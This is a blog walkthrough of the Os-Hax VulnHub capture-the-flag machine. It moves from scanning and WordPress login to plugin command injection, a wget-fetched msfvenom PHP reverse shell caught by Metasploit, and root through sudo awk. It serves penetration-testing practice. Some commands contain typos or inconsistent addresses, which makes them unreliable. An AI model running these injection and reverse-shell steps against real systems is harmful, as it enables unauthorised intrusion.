Os-Hax Walkthrough vulnhub CTF

Today we are solving Os-Hax Walkthrough for and this CTF is designed by.. Rahul Gehlaut
Os-Hax walkthrough

You can download here. (Os-Hax Walkthrough)

Level: Intermediate

Boot to Root

Tool Used

  •  Netdiscover
  •  Dirb
  •  Nmap
  •  ExifTool
  •  Metasploit

Find of All IP  We did this using the Netdiscover command

Os-Hax walkthrough

we can continue to our second step that is scanning the target With Nmap Aggressive scan

nmap  -A 192.168.1.31

We found port 22, 80 Open HTTP

Type your machine IP in the web browser

Os-Hax walkthrough

Without wasting time enumerate the Directory

Enumerate the Directory With Dirb

dirb http://192.168.1.31
Os-Hax walkthrough

And Found some directory  you will navigate to the following URL

http://192.168.1.31/img

And Find A Our First Flag

Os-Hax walkthrough

Now Download Image file flaghost.png

Data Exfiltration-Steganography

Now After Download the image Extract-Data Image

Os-Hax walkthrough

And Find Next Hint found a directory [email protected]

After Open the directory find the Flag2.txt

Open the file Flag2.txt

And Find Brain-Fuck Encode Code

And After Decode the Coad Find A WordPress Password

Decoder Website https://www.splitbrain.org/_static/ook/

Username: web

Password: [email protected]

            Next Step is Add a host file some Text

Vi /etc/hosts

After Add, My CTF IP and localhost Save the file

And Open Follow the URL Find a WordPress  Page

http://localhost/wordpress

Without waste a time open the WordPress  login panel

http://localhost/wordpress/wp-login.php
Os-Hax walkthrough

And login with already found password

And after login WordPress Found a vulnerable Plugin Activity Manager

Os-Hax walkthrough

And open Activity Manager tool found a command injection

Let’s Check the command

127.0.0.1 |id

And this is working after the command I see the output

Os-Hax walkthrough

After Check command injection work and create our payload with Metasploit

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.2 lport=4545 -f raw

open vi editor save the output text payload.php

create a Python Server

python -m SimpleHTTPServer

wget command download our payload target machine

Os-Hax walkthrough

First, remove maxlenght=15 to 100 inspect element

127.0.0.1 | wget http://192.168.1.2:8000/payload.php
Os-Hax walkthrough

Execute our payload this command 127.0.0.1 | php payload.php

Os-Hax walkthrough
Msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.1.1
set lport 4545
run

And got a reverse connection

Os-Hax walkthrough

First import python for proper shell

python -c ‘import pty;pty.spawn(“/bin/bash”)’
Os-Hax walkthrough
Os-Hax walkthrough
cd /home
ls
cd web
ls

and I see our 3 flag

cat flag.txt

Privilege Escalation

For finding the 4th flag we need to escalate root privilege, let’s identify sudo rights for Alice with the help of the following command.

sudo -l

So here Alice can run awk as root without using the password and we can easily spawn root shell by exploiting this permission

sudo /user/bin/awk 'BEGIN {system("/bin/bash")}'
id
cd /root
ls
cat final.txt
Os-Hax walkthrough

FLAG 4: COMPLETE! Congratulations

Author Name: Rahul Gehlaut see more blog here

About Rahul Gehlaut

Cyber Security Researcher, CTF Player. Tech Blog Writer.

View all posts by Rahul Gehlaut →